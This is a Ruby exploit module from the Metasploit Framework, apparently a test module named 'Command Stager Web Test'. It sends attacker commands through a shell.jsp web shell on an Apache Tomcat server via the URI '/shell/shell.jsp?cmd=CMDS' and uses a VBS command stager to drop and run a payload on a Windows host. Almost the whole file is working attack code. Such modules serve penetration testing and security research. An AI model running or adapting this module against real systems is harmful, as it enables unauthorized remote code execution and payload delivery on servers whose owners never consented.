metasploit-gs/modules/exploits/test/cmdweb.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	# =( need more targets and perhaps more OS specific return values OS specific would be preferred

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::CmdStagerVBS

	def initialize(info = {})
		super(update_info(info,
			'Name'	      => 'Command Stager Web Test',
			'Description'  => %q{
					This module tests the command stager mixin against a shell.jsp application installed
				on an Apache Tomcat server.
			},
			'Author'	=> 'bannedit',
			'Version' => '$Revision$',
			'References' =>
				[
				],
			'DefaultOptions' =>
				{
				},
			'Payload' =>
				{
				},
			'Platform' => 'win',
			'Privileged' => true,
			'Targets' =>
				[
					# need more but this will likely cover most cases
					[ 'Automatic Targeting',
						{
							'auto' => true
						}
					],
				],
			'DefaultTarget' => 0,
			'DisclosureDate' => 'Feb 03 2010'))

		register_options(
			[
				Opt::RPORT(8080),
			], self.class)
	end

	def autofilter
		false
	end


	# This is method required for the CmdStager to work...
	def execute_command(cmd, opts)
		uri = opts[:uri]
		http_hash = {
			'uri' => uri.gsub(/CMDS/, Rex::Text.uri_encode(cmd))
		}
		resp = send_request_raw(http_hash, 5)
	end

	def exploit

		opts = {
			:delay => 0.5,
			:uri => "/shell/shell.jsp?cmd=CMDS"
		}

		execute_cmdstager(opts)

		handler

	end

end